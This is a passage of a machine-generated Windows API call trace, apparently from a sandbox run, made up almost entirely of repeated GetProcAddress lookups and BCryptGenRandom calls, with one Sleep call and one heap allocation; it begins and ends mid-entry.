(hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0253.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0253.132] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0253.132] Sleep (dwMilliseconds=0x1b193) [0253.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0253.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.286] GetProcessHeap () returned 0x440000 [0253.286] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01950 [0253.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01951, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a01951) returned 0x0 [0253.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0253.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0253.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01980, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a01980) returned 0x0 [0253.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0253.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01995, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a01995) returned 0x0 [0253.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0253.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0253.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0253.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a019a7, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a019a7) returned 0x0 [0253.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.523] GetProcAddress (hModule=0x7ffc5bcc0000, 